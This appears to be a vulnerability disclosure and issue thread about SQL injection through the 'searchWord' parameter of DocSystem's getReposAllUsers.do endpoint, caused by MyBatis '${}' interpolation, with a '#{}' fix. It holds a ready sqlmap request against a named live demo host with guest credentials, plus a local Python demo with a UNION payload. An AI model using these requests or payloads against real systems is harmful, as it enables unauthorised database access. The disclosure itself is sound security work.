There is an interface with SQL injection:
/DocSystem/Repos/getReposAllUsers.do
From the back-end code, the database query behind this interface goes through 'getReposAllUsers()', which receives two parameters, 'searchWord' and 'reposId':

'getReposAllUsers()' in turn calls 'queryReposMemberWithParamLike()' to process the incoming parameters:


View 'ReposAuthMapper.xml':

It turns out that 'queryReposMemberWithParamLike' interpolates the incoming parameters with '${}' (MyBatis string substitution, pasted straight into the SQL text) instead of '#{}' (a precompiled parameter placeholder), so the value of 'searchWord' lands inside the LIKE clause unescaped, which leads to SQL injection.
Vulnerability exploitation demonstration:
The demo site provided by the author is used to demonstrate the exploit:
http://dw.gofreeteam.com/DocSystem/web/index.html
Log in with guest/guest

Capture the request:

Change the URL to '/DocSystem/Repos/getReposAllUsers.do' and switch the request to the POST method:

Construct the request, filling in the 'reposId' and 'searchWord' parameters:

SQL injection through the 'searchWord' parameter:

Verify with sqlmap; the request is as follows (the '*' in the body is sqlmap's marker for the injection point when the request is fed in with -r):
POST /DocSystem/Repos/getReposAllUsers.do HTTP/1.1
Host: dw.gofreeteam.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=30230AB3A967C905F212A4D3A981894D
If-Modified-Since: Mon, 15 Aug 2022 09:41:58 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

reposId=28&searchWord=*
Use the SQL injection to obtain the current database name:

In addition, the LIKE statements in other interfaces also do not use precompiled parameters.
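The two points the report makes, that MyBatis '${}' pastes the parameter into the SQL text while '#{}' binds it as a prepared-statement parameter, and that the resulting LIKE clause can be turned into a read of other data (the step sqlmap automates above), reproduced locally as an added example. This is not DocSystem's code and not the reporter's payload: the table and column names, the two mapper statements, the sample rows and the payload are all constructed for the demo, and a 'secrets' table stands in for the database name because SQLite has no database() function.

```python
import re
import sqlite3

# Constructed sample data standing in for a DocSystem repository-member table.
# Table and column names are assumptions for this demo, not DocSystem's schema.
SAMPLE_ROWS = [
    (1, 28, "alice", "alice@example.com"),
    (2, 28, "bob", "bob@example.com"),
    (3, 29, "carol", "carol@example.com"),
]

# Two MyBatis-style mapper statements (assumed shape, not the real
# ReposAuthMapper.xml). The first interpolates searchWord with ${}, the second
# binds it with #{} and expects the caller to add the % wildcards.
VULNERABLE_SQL = (
    "SELECT id, reposId, userName, email FROM reposMember "
    "WHERE reposId = #{reposId} AND userName LIKE '%${searchWord}%'"
)
FIXED_SQL = (
    "SELECT id, reposId, userName, email FROM reposMember "
    "WHERE reposId = #{reposId} AND userName LIKE #{searchWord}"
)

_DOLLAR = re.compile(r"\$\{(\w+)\}")
_HASH = re.compile(r"#\{(\w+)\}")


def render(template, params):
    """Mimic MyBatis: ${x} is pasted into the SQL text before the statement is
    prepared, #{x} becomes a '?' placeholder whose value travels separately."""
    sql = _DOLLAR.sub(lambda m: str(params[m.group(1)]), template)
    bound = []

    def placeholder(m):
        bound.append(params[m.group(1)])
        return "?"

    sql = _HASH.sub(placeholder, sql)
    return sql, tuple(bound)


def open_db():
    """In-memory SQLite with the member table plus a 'secrets' table that plays
    the role of the data an attacker reaches with UNION (SQLite has no
    database() function, so this stands in for 'current database name')."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE reposMember (id INTEGER, reposId INTEGER, userName TEXT, email TEXT)"
    )
    conn.executemany("INSERT INTO reposMember VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    conn.execute("CREATE TABLE secrets (name TEXT, value TEXT)")
    conn.execute("INSERT INTO secrets VALUES ('db_name', 'docsystem_demo')")
    return conn


def vulnerable_lookup(repos_id, search_word):
    sql, bound = render(VULNERABLE_SQL, {"reposId": repos_id, "searchWord": search_word})
    return open_db().execute(sql, bound).fetchall()


def fixed_lookup(repos_id, search_word):
    # The wildcards are added to the *value*, so whatever searchWord contains
    # it is only ever compared as a pattern, never parsed as SQL.
    # (Escaping % and _ inside search_word is a separate concern, not injection.)
    params = {"reposId": repos_id, "searchWord": f"%{search_word}%"}
    sql, bound = render(FIXED_SQL, params)
    return open_db().execute(sql, bound).fetchall()


# Constructed payload: closes the LIKE string, appends a UNION that pulls from
# another table, and comments out the trailing %' left by the template.
PAYLOAD = "x%' UNION SELECT 1, 28, name, value FROM secrets --"

if __name__ == "__main__":
    print(vulnerable_lookup(28, "ali"))    # normal use: [(1, 28, 'alice', 'alice@example.com')]
    print(vulnerable_lookup(28, PAYLOAD))  # leaks: [(1, 28, 'db_name', 'docsystem_demo')]
    print(fixed_lookup(28, PAYLOAD))       # payload is just a pattern: []
```

With the '${}' statement the payload is spliced into the query text and the UNION runs; with the '#{}' statement the same bytes are handed to the driver as a parameter and match nothing. Against the live target the equivalent of the report's last step is feeding the saved request to sqlmap with -r and asking for --current-db.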
Do you mean changing the content of searchWord to SQL syntax?
In your screenshot, searchWord is only changed to *; is the screenshot incomplete?
Replace '%${}%' with #{} to avoid the injection of SQL commands.